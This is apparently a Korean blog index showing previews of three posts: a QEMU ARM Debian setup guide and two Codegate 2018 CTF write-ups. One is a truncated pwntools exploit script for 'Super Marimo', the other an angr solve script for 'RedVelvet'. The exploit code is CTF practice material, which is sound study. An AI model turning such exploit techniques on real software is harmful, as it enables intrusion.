## arm in qemu

Qemu에서 ARM Debian 실행

```
# apt-get install qemu
# wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2
# wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress
# wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress
```

* CUI 환경 + 인터넷 사용

```
# qemu-system-arm -M vexpress-a9 \
    -kernel vmlinuz-3.2.0-4-vexpress \
    -initrd initrd.img..
```

더보기

## [Codegate 2018 CTF] Super Marimo

```python
# exploit.py
from pwn import *
from time import *

def ShowMe(name, profile):
    p.sendline('show me the marimo')
    print p.recvuntil('>> ')
    p.sendline(name)
    print p.recvuntil('>> ')
    p.sendline(profile)
    print p.recvuntil('>> ')

def View(index, data):
    p.sendline('V')
    print p.recvuntil('>> ')
    sleep(3)
    p.sendline(index)
    print p.recvuntil('>> ')
    p.sendline('M')
    print p.recvuntil('>> ')
    p.sendline(data)
    pr..
```

더보기

## [Codegate 2018 CTF] RedVelvet

```python
# exploit.py
import angr

def main():
    proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False})
    path_group = proj.factory.path_group(threads=4)
    path_group.explore(find=0x401631, avoid=(0x401621, 0x4016cb, ))
    return path_group.found[0].state.posix.dumps(1)

if __name__=='__main__':
    print(repr(main()))
```

결과 값은 "What_You_Wanna_Be?:)_lc_la" 가 나오게 되는데, 게싱을 통해 아래와 같이 정확한 플래그를 알아냈다.

FLAG : ..

더보기